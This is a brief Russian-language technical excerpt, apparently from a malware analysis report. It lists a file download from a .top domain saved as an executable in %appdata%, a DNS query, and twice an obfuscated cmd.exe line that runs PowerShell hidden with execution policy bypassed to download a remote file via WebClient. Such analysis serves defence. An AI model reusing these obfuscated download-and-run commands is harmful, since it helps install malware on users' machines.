Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWER^s^HEL^L.exE^ -EXEc^UT^iONPoLiCy ^B^Y^p^ASS -NoP^r^o^FIle -W^INdO^W^S^TY^Le ^H^iddEn^ (^NEw-o^BJeCT^ sYS^tEM.^nET.^WeB^C^lIeNt)^.Do^WN^L^OAdF^i^L^E(^'http://www.z...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POWER^s^HEL^L.exE^ -EXEc^UT^iONPoLiCy ^B^Y^p^ASS -NoP^r^o^FIle -W^INdO^W^S^TY^Le ^H^iddEn^ (^NEw-o^BJeCT^ sYS^tEM.^nET.^WeB^C^lIeNt)^.Do^WN^L^OAdF^i^L^E(^'http://www.z...' (со скрытым окном)